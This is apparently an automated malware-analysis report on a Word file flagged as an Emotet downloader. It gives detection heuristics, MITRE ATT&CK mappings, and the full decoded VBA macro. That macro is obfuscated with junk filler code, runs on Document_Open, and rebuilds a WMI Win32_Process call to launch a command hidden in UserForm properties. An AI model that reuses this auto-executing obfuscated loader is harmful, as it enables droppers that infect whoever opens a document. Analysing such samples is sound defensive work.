MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate or Obfuscate Malicious Code
The file contains a VBA macro that utilizes a hidden UserForm command stager, a technique commonly associated with Emotet. The macro is obfuscated and appears to be designed to download and execute a second-stage payload. ClamAV detection further supports the Emotet family attribution.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7464372-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464372-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
MNDUE = "32ksad_weddv" Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess" Select Case Dudqtilj -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Next Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu) Select Case Yhdhwylebxxim -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox" Private Sub Document_open() Select Case Jirqxvrcjakzc -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10697 bytes |
SHA-256: 46bc66e7944768f389fb49a211b7889dfddf333fea30766c468c11f7e6f20d48 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
344 of 513 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Cfifdbzh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Jirqxvrcjakzc
Case Dhgzjyzqjcpm
Oyrcksll = Sin(Hhoupuixdsloy)
Aksioijycvctx = CStr(Kriksbjf)
Trjzoazlcji = 324
Knxjmzma = Sin(Yitfnmxre)
Uqaynuciuivr = CStr(Wuswgnoilkrvu)
Esdbjqwxkzeks = 567
Dqehrsfuydflf = Sin(Raqipprqf)
Whwbdvso = CStr(Rmvgzyfx)
Rheieujai = 5645
End Select
For Yarvxxxaktrjf = Vcqqmtcciod To Jlrfubslelcai
While Layyiryhkrag <> Igtjzryblodhb
Nqewirhqefg = Houvwnvej * Atn(Fvjpjvbph) * (Bvkogaqodtgtu + Iknvmeyvqnhs)
Wend
Next
Select Case Vehtpovkfitu
Case Fhtiknlvszx
Zpuuttwposwh = Sin(Heiqeqrbekhf)
Zmhwjsvvlo = CStr(Fzrowakt)
Jjtpdxkjmntm = 324
Kaygxmsu = Sin(Ksjqnhuf)
Dydtpykbb = CStr(Tjqdwcdvs)
Sqelntwftnh = 567
Lxerzbqsfvrit = Sin(Frjmingmoek)
Wstmbsszx = CStr(Rjxnunduheabd)
Kfkpnokkwmcfg = 5645
End Select
For Rhenvzqtsbbq = Vqprcimo To Hgybasixtnntx
While Ztlsomxbjavmn <> Hczfgoapsase
Nctztcobwumj = Affvtagkurk * Atn(Esrviafvybnub) * (Gfswjlpnu + Wpdhcpjdki)
Wend
Next
Select Case Xutfhjzrc
Case Fxvmwkubs
Hmzcyhinjzpn = Sin(Jdcqrdzqn)
Kpwnatild = CStr(Fekrioviq)
Engrlasuqye = 324
Rmzifgbducx = Sin(Zukvffxvl)
Jiitixhbj = CStr(Wondjilj)
Sfaxkutyxt = 567
Tywyivwv = Sin(Kzywicwojby)
Chvycocmcts = CStr(Gkzqmpmevbz)
Qcijefvhuq = 5645
End Select
For Ugubhfgatwlpt = Kmggwkpxzd To Nzglultsisc
While Snsurtqpvkvnk <> Ejuypptbnk
Zwbsjskd = Cikbarokyjuhn * Atn(Eyfzlfkaprsus) * (Aoohgmonpbmc + Jrjcteued)
Wend
Next
Xgmmntpfabj
End Sub
Attribute VB_Name = "Nvexppvwbclb"
Attribute VB_Base = "0{A6D80BC6-2311-44CA-A76A-75F767D585D2}{366FF9DB-38AE-4D4B-A864-A07D6AC66334}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uyrkuoeaboav"
Function Wyjpoleontqe()
Select Case Pudafirtriera
Case Ethbtoflgkn
Rcdncrfu = Sin(Uvfwlerxpk)
Ncqpkjiwqrbq = CStr(Erpjovsjmgn)
Hpnywjyobxnh = 324
Ptdupuwzah = Sin(Vzepkbsqagcsf)
Adubcsjd = CStr(Myxwipfsan)
Lmloelirkp = 567
Vvfgddlvogy = Sin(Tsrxaeseqrhq)
Yvyzxpgbmjz = CStr(Cdwfoitltrtkk)
Fdypppnapg = 5645
End Select
For Osfhykhqbum = Ucfefomav To Ljahocgynv
While Njvaczjkrgiu <> Wksontwww
Zcznoemqjr = Ojallreagu * Atn(Wgzhlxrng) * (Wkwdbvde + Ademhkfr)
Wend
Next
Svoeisqwp = Cfifdbzh.Txqcvasu
Select Case Ywnwqvijnirak
Case Ixsdlntodw
Gvwqliwgnveis = Sin(Xamjybve)
Svleikaex = CStr(Qsfsokxnsjl)
Voqmnvkqqk = 324
Kbfkeeuzmh = Sin(Rjryrnvhl)
Ttnqbrxahm = CStr(Jscofrka)
Judemzcpl = 567
Smrqnshoga = Sin(Fifozppbyu)
Snxfyysbes = CStr(Lysydmhfo)
Wgldzvznyygxz = 5645
End Select
For Qiithmrz = Xqxlmhvk To Znutfefr
While Asdbvzxvb <> Ghccecbmr
Lucdnpochas = Envqnkai * Atn(Sfsqacdfptnhi) * (Lhhzdenibxrg + Hkehzjyvynzdv)
Wend
Next
Twyotyzlmuu = Svoeisqwp + Nvexppvwbclb.Kdxtincasrpzy + Nvexppvwbclb.Fhwefplfn + Nvexppvwbclb.Ejngnmrbmmuof
Select Case Rcmsldowoup
Case Fqejjmrliy
Doirgesgqe = Sin(Lbolnkoemqmf)
Apybidcjhpff = CStr(Xauaxmyixgy)
Fwmbdkkech = 324
Qqctzgibyglwm = Sin(Xrssdkswmuoc)
Lvtfehvwpyzpw = CStr(Kqpvpnnkollyt)
Lendnlsqhbzac = 567
Oogxbeygfkxk = Sin(Sibgqnvbsyns)
Uqmlqvxxs = CStr(Umxitpanxos)
Lgxmvhjjeqmp = 5645
End Select
For Ujvvqerway = Inectcsszkylb To Fqwksvdgebs
While Cpfzswyvebxk <> Nkkkufrmg
Bdfhzbaazpk = Tfmraozavqpvu * Atn(Vbqjblqtsofaw) * (Pcflrptzlremf + Lfkbfyzbdnc)
Wend
Next
Ybazpsmlhhhz = Twyotyzlmuu + Nvexppvwbclb.Kxwxljzwwv + Nvexppvwbclb.Jjxokufcbwu.Factoid
Select Case Cdvzgcgdbcvr
Case Xyhuuhukhb
Mzlaphwlln = Sin(Tsqekxotqanh)
Sfasvthyqg = CStr(Moulxjop)
Qqzknzsl = 324
Feorltsql = Sin(Jmjlzyfd)
Fkrojslfifeu = CStr(Iadzeryefzgdq)
Anihlztxcba = 567
Dqypzncyuf = Sin(Ubfshfbnqhs)
Bvpdaydkmbo = CStr(Edvpghjurynf)
Ztuwxccyrnvug = 5645
End Select
For Haqrqbxr = Knsjxbyf To Rsfqypfm
While Mbnsjywneubc <> Npjotmwoerkp
Sbvligojzzaye = Icpzkdjf * Atn(Vyxwvhudwudy) * (Mgepjovhlnwo + Kwjvesmirme)
Wend
Next
Wyjpoleontqe = Pwygysmwjcru + Ybazpsmlhhhz + Pwygysmwjcru
Select Case Lcwitdhj
Case Nlgyrrzxn
Sqgvgxjelxtsa = Sin(Ihvliyfbv)
Yxzvqreeslp = CStr(Fyexittfhlj)
Bbynpkdr = 324
Fpgbowytsv = Sin(Jthscyirl)
Pqdgewfi = CStr(Nzhbrfjjs)
Svrefwifihzom = 567
Kptxnmmzwu = Sin(Kszitzgwulb)
Xdnznkujgutpu = CStr(Gvvkffymiz)
Gvqznuyqjzz = 5645
End Select
For Fheygszwvq = Rttzreahvno To Fvwnbgvmbzyt
While Hgslfrjw <> Rrvzbortp
Wdjtjdeq = Fcbsaccixmiv * Atn(Jlvkmieelckdj) * (Oeggjlotgalol + Rblmkxhtdlq)
Wend
Next
End Function
Function Xgmmntpfabj()
Select Case Zcvyzfxy
Case Lgootoeshbduc
Nsfrcnunt = Sin(Tzysthmqjxvg)
Pzmnyfzsqlmsh = CStr(Qtuobvetoi)
Mtkrmdrno = 324
Uusajmgaatese = Sin(Aelfxfdxmzft)
Pfyitaujuug = CStr(Upiagqucn)
Kuqxfbdtg = 567
Ngjkaxqkqy = Sin(Iheyzdfmcdpxz)
Etrnbxkccqvpw = CStr(Lkuwipac)
Axhjqmkramr = 5645
End Select
For Oayfchdnia = Fcdbgdqmyazd To Elyvzlmzgv
While Yubcrwhrlj <> Tjammnbvmqd
Mbofgwirwfw = Icvbaveicpkzm * Atn(Pxhrjmevslem) * (Xeebqeyzlqhnh + Dfteocyxeb)
Wend
Next
MNDUE = "32ksad_weddv"
Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
Select Case Dudqtilj
Case Mzvpijcqtv
Pwwovkwiib = Sin(Dekxkkgn)
Vnncqdpyr = CStr(Tfhtenanpakf)
Dzfgjouyib = 324
Susskkdk = Sin(Cdgwfawgkhvpn)
Rhbyvwgkdu = CStr(Xqachcewcamj)
Bqbfdhoj = 567
Blocwtcb = Sin(Zpkfnmiih)
Sdtupjyrzfoy = CStr(Vobzixlk)
Mgvrqyfb = 5645
End Select
For Iiuhgkekz = Rneryhiztj To Rijngbbamxp
While Tttytakoqut <> Rqxchyasczwwx
Zyuynefnpaajy = Oqxhjkdk * Atn(Rvquwbvrlor) * (Dvlchbhpbrbk + Qzowofhvjpttz)
Wend
Next
Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
Select Case Yhdhwylebxxim
Case Ufaiuzqc
Ewxcbkbfj = Sin(Hsezvbfg)
Jlcbtpgvxhe = CStr(Rcoczmvd)
Cmnwjzxkw = 324
Ulvahvujmow = Sin(Mxgzftjmgfa)
Sxwzwidlx = CStr(Bsrbuqrgfwjl)
Fcocnfumccwmm = 567
Dfpgnynbisp = Sin(Jijmebrfpijl)
Ppehdasbquf = CStr(Sbfkxradtskil)
Oxfupjxme = 5645
End Select
For Mbhspgzbye = Mtylwwtzsajmt To Pqvobzlfyv
While Eikbefzt <> Xaqkltlsvya
Kdqhyaozqv = Qhzfhtvkytu * Atn(Ortgaccjyay) * (Bslrgexuummmn + Klqisqjiv)
Wend
Next
Fhpzuxlwmaukx = Yidwojlxvu + Nvexppvwbclb.Ygxcnftfdrk.ControlTipText + Nvexppvwbclb.Gyykdkjt.ControlTipText
Select Case Kumigxelb
Case Xmpmgyjz
Mkdugown = Sin(Savlzvwq)
Rykgmjohasp = CStr(Iyjiozjiybdjx)
Nlbtkiina = 324
Xapmhovam = Sin(Miqfitxhxos)
Pqwmrzljlfci = CStr(Tonxeswztc)
Opsateqv = 567
Rjjnahacowp = Sin(Tjqnqxpw)
Qlvqlmxsx = CStr(Xeorrpyr)
Kgmzrcqzxh = 5645
End Select
For Csbfqpqqeruav = Wzhrffxf To Rujgszgizb
While Myjbxftmldm <> Apqosfmxwyvg
Rnswcghnii = Rmsxohimr * Atn(Thwjspanuot) * (Thktmnghlknae + Oxwthxyofx)
Wend
Next
Zcamqyegpjckz = Fhpzuxlwmaukx + Cfifdbzh.Txqcvasu
Select Case Nebhhwjgrpo
Case Tlnyovaatjkdu
Dmxhndeenl = Sin(Fxdrrcxik)
Zzkouvqdnx = CStr(Frhdtoha)
Pvcprtbx = 324
Ccxicokiwhyie = Sin(Zkydtcawxjple)
Cqgaactyafezd = CStr(Hqhrsict)
Bgazndfeyfibd = 567
Gmxypdxrubzdn = Sin(Zwjezwtyncy)
Zugmovlwe = CStr(Sepfyozst)
Mrzuznnkw = 5645
End Select
For Srzumpsasu = Lugnaycg To Tiomtvyitzrj
While Gdbjztrllpozs <> Ltjixxrgzwx
Aakbiihwxt = Diwyytcyv * Atn(Iboaoxbnc) * (Lkfmrktqo + Atpuhacv)
Wend
Next
Set Xgmmntpfabj = CreateObject(Zcamqyegpjckz)
Select Case Mkeoisdh
Case Ebiywags
Yovmuwzznhy = Sin(Hiltnvlsime)
Earikgew = CStr(Osumtdtgbzmbq)
Txcvpbrzq = 324
Hfwsasdkxbtjs = Sin(Fcnqckgbrjc)
Vwsdtuvojjz = CStr(Gnfaojhawomaq)
Dfixrpob = 567
Pysbvtoveet = Sin(Ustnzhfccfuk)
Bdirlxky = CStr(Zavyfmkhino)
Cotcmnsxrrtmr = 5645
End Select
For Hygvheozmh = Vmcqmwfgdsu To Trijclnrxa
While Swtophuow <> Oahpmojpeh
Nfqkwjzymsj = Lsnlzjowftjvv * Atn(Okezhigi) * (Yfxyzvqnpbwve + Vrhmhpbhxkboj)
Wend
Next
Xgmmntpfabj.XSize = False
Select Case Dzaqiwcty
Case Rxjjznnirydbp
Feszrdghtgdqh = Sin(Wmejmvcgw)
Ohizylmkrxaz = CStr(Kqqcvwfukbqw)
Dcyvexpyztis = 324
Wjwnvqbfmebyo = Sin(Gjcfugozeuldm)
Ucsiyafdapqyq = CStr(Gjvatkfmjqhk)
Jmoopjyfgvwa = 567
Qeiyfkoc = Sin(Wmppjrqqnl)
Bjakvadz = CStr(Edwfijehdhdc)
Ujwofgmu = 5645
End Select
For Dyyvooyjidh = Dihmghjyyrwp To Ouxgjsic
While Jtoiuunwip <> Xtgmbpegb
Kkpkxxtk = Wcmsbddeahwli * Atn(Zwrtxcje) * (Yfkqyoerg + Tuzlbcayeyb)
Wend
Next
Xgmmntpfabj.YSize = False
Select Case Okkazawojaab
Case Mkapxqbst
Iyhrakbqntmtr = Sin(Jwfvdezag)
Rzduwrpbrcpw = CStr(Zlqmzrihqhe)
Quixbwgsbmtxv = 324
Retzvfetiog = Sin(Kjwpjtygif)
Dxxyxpen = CStr(Lnersmbaius)
Spdncfkiy = 567
Shhulycqsuxik = Sin(Meiwthhq)
Tbbiihmify = CStr(Hokscdnvh)
Ctfablrlrclrw = 5645
End Select
For Kmkzftohw = Bedcjbafzo To Lxnmubwxn
While Takhncnljgpk <> Otjqqathf
Sgtfavyi = Cyundlctav * Atn(Eghnhxrb) * (Lfvvugilqbdy + Odmoqofdorbn)
Wend
Next
Do While Hfiglzcehibq.Create(UJNDB & Wyjpoleontqe, Hsqlwgckyi, Xgmmntpfabj, Dbsewlml)
Loop
Select Case Frszjoiyo
Case Lxxxyncay
Eqxhbtpdgo = Sin(Ifjswjfqwr)
Tddhcbzto = CStr(Cbbnojlqtr)
Spvgqsaqnjq = 324
Qhafoaxpsgquw = Sin(Lbmpholrg)
Aobzskmqxb = CStr(Frnzziemub)
Lxbhifquj = 567
Jnsoghftfaqgx = Sin(Liciozuwoui)
Slqbzrelh = CStr(Eoioevqdmsuhr)
Apreuxbxatko = 5645
End Select
For Pddoeezrf = Dfspydyairpu To Acrhuugjxxpqt
While Rjjzlrsjhcqlo <> Aibpebijlxm
Vahkmdqif = Ihtjeeirkjw * Atn(Diujzyczwln) * (Fzkiguokgwiy + Oujyztsgd)
Wend
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.